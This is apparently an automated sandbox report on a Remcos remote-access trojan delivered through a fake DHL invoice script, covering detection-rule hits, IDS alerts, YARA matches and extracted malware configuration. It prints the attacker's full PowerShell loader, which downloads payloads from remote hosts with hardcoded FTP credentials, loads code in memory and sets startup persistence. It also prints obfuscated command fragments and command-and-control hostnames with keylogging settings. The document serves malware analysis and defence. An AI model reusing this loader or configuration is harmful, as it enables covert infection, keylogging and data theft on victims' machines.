                      Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: cmd.exe /c mkdir "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\", CommandLine: cmd.exe /c mkdir "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ylfyq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ylfyq = ($ylfyq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ylfyq = ($ylfyq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mjnby = (New-Object Net.WebClient);$mjnby.Encoding = [System.Text.Encoding]::UTF8;$mjnby.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$zfgjg.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $zfgjg.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$zfgjg.dispose();$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $zfgjg.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.cnisms/cangoc/snigulp/tnetnoc-pw/rb.moc.igelebs//:ptth' , $huUPX , 'D D1D' ) );};", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1436, ParentProcessName: powershell.exe, ProcessCommandLine: cmd.exe /c mkdir "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\", ProcessId: 5524, ProcessName: cmd.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcAA6AC8ALw' + [char]66 + 'zAGIAZQ' + [char]66 + 'sAGUAZw' + [char]66 + 'pAC4AYw' + [char]66 + 'vAG0ALg' + [char]66 + 'iAHIALw' + [char]66 + '3AHAALQ' + [char]66 + 'jAG8Abg' + [char]66 + '0AGUAbg' + [char]66 + '0AC8AcA' + [char]66 + 'sAHUAZw' + [char]66 + 'pAG4AcwAvAGMAbw' + [char]66 + 'nAG4AYQ' + [char]66 + 'jAC8Acw' + [char]66 + 'tAHMAaQ' + [char]66 + 'uAGMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAGcAag' + [char]66 + 'nAGYAegAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAGcAag' + [char]66 + 'nAGYAegAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAGcAag' + [char]66 + 'nAGYAegAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + 'nAGoAZw' + [char]66 + 'mAHoAJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66
                      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcAA6AC8ALw' + [char]66 + 'zAGIAZQ' + [char]66 + 'sAGUAZw' + [char]66 + 'pAC4AYw' + [char]66 + 'vAG0ALg' + [char]66 + 'iAHIALw' + [char]66 + '3AHAALQ' + [char]66 + 'jAG8Abg' + [char]66 + '0AGUAbg' + [char]66 + '0AC8AcA' + [char]66 + 'sAHUAZw' + [char]66 + 'pAG4AcwAvAGMAbw' + [char]66 + 'nAG4AYQ' + [char]66 + 'jAC8Acw' + [char]66 + 'tAHMAaQ' + [char]66 + 'uAGMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAGcAag' + [char]66 + 'nAGYAegAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAGcAag' + [char]66 + 'nAGYAegAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAGcAag' + [char]66 + 'nAGYAegAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + 'nAGoAZw' + [char]66 + 'mAHoAJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66
                      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1436, TargetFilename: C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\x2.ps1

                      Persistence and Installation Behavior

                      barindex
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ylfyq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ylfyq = ($ylfyq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ylfyq = ($ylfyq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mjnby = (New-Object Net.WebClient);$mjnby.Encoding = [System.Text.Encoding]::UTF8;$mjnby.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$zfgjg.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $zfgjg.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$zfgjg.dispose();$zfgjg = (New-Object Net.WebClient);$zfgjg.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $zfgjg.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.cnisms/cangoc/snigulp/tnetnoc-pw/rb.moc.igelebs//:ptth' , $huUPX , 'D D1D' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ylfyq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ylfyq = ($ylfyq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ylfyq = ($ylfyq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$mjnby = (New-Object Net.WebClient);$mjnby.Encoding = [System.Text.Encoding]::UTF8;$mjnby.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHL_Shipping_Invoices_Awb_0000000.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertif

                      Stealing of Sensitive Information

                      barindex
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ProcessId: 7332, TargetFilename: C:\ProgramData\remcos\logs.dat
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-14T11:10:29.410594+020020204231Exploit Kit Activity Detected128.201.75.19780192.168.2.549711TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-14T11:10:29.410594+020020204251Exploit Kit Activity Detected128.201.75.19780192.168.2.549711TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-14T11:10:40.792712+020020365941Malware Command and Control Activity Detected192.168.2.549775172.111.213.723981TCP
                      2024-10-14T11:10:42.464582+020020365941Malware Command and Control Activity Detected192.168.2.549788172.111.213.723981TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-14T11:10:33.511413+020028033053Unknown Traffic192.168.2.549728188.114.97.3443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-14T11:10:42.207450+020028033043Unknown Traffic192.168.2.549787178.237.33.5080TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-14T11:10:20.642799+020028410751Malware Command and Control Activity Detected192.168.2.549706188.114.97.3443TCP
                      2024-10-14T11:10:27.761779+020028410751Malware Command and Control Activity Detected192.168.2.549709188.114.97.3443TCP
                      2024-10-14T11:10:33.511413+020028410751Malware Command and Control Activity Detected192.168.2.549728188.114.97.3443TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 0000001D.00000002.2435197819.00000000015E8000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "janbours92harbu03.duckdns.org:3980:0janbours92harbu04.duckdns.org:3981:1janbours92harbu007.duckdns.org:3981:1", "Assigned name": "MANIFESTATIONOFWEALTH", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "Rmc-DGYVFK", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                      Source: janbours92harbu04.duckdns.orgVirustotal: Detection: 6%Perma Link
                      Source: desckvbrat.com.brVirustotal: Detection: 7%Perma Link
                      Source: ftp.desckvbrat.com.brVirustotal: Detection: 8%Perma Link
                      Source: janbours92harbu03.duckdns.orgVirustotal: Detection: 10%Perma Link
                      Source: http://desckvbrat.com.brVirustotal: Detection: 7%Perma Link
                      Source: janbours92harbu03.duckdns.orgVirustotal: Detection: 10%Perma Link
                      Source: http://ftp.desckvbrat.com.brVirustotal: Detection: 8%Perma Link
                      Source: https://pastebin.com/raw/pQQ0n3eAVirustotal: Detection: 5%Perma Link
                      Source: Yara matchFile source: 27.2.powershell.exe.1c7286e7ed8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.powershell.exe.286cfc17920.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.powershell.exe.1c41e7c6f90.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.powershell.exe.1c7286e7ed8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.powershell.exe.1c41e7c6f90.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.powershell.exe.286cfc17920.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001D.00000002.2435197819.00000000015E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.3336616303.00000000012F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2362918816.0000000001048000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2608765133.00000286CFA70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2474230885.000001C41E230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.3340320354.0000000002E8F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.2715340821.000001C7283BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2474230885.000001C41E49E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7224, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,20_2_004338C8
                      Source: powershell.exe, 0000000D.00000002.2474230885.000001C41E49E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_a9574309-4

                      Exploits

                      barindex
                      Source: Yara matchFile source: 27.2.powershell.exe.1c7286e7ed8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.powershell.exe.286cfc17920.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 20.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.powershell.exe.1c41e7c6f90.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.powershell.exe.1c7286e7ed8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.powershell.exe.1c41e7c6f90.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.powershell.exe.286cfc17920.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000002.2608765133.00000286CFA70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2474230885.000001C41E230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.2715340821.000001C7283BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.2474230885.000001C41E49E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.2356908740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7224, type: MEMORYSTR

                      Privilege Escalation

                      barindex
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_00407538 _wcslen,CoGetObject,20_2_00407538
                      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49706 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.5:49744 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.5:49776 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.5:49819 version: TLS 1.2
                      Source: Binary string: F:\Source Coder Vb.net C#\crc crypter\Source code UpCry\Metodo DF\ClassLibrary3\ClassLibrary3\obj\Release\ClassLibrary3.pdb source: powershell.exe, 00000004.00000002.2802743129.0000012FDD430000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC66FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2292021482.0000012FC535F000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,15_2_100010F1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 15_2_10006580 FindFirstFileExA,15_2_10006580
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,20_2_0040928E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,20_2_0041C322
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,20_2_0040C388
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,20_2_004096A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,20_2_00408847
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_00407877 FindFirstFileW,FindNextFileW,20_2_00407877
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0044E8F9 FindFirstFileExA,20_2_0044E8F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,20_2_0040BB6B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,20_2_00419B86
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,20_2_0040BD72
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_0040AE51 FindFirstFileW,FindNextFileW,21_2_0040AE51
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,23_2_00407EF8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 24_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,24_2_00407898
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 20_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,20_2_00407CD2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData

                      Software Vulnerabilities

                      barindex
                      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49788 -> 172.111.213.72:3981
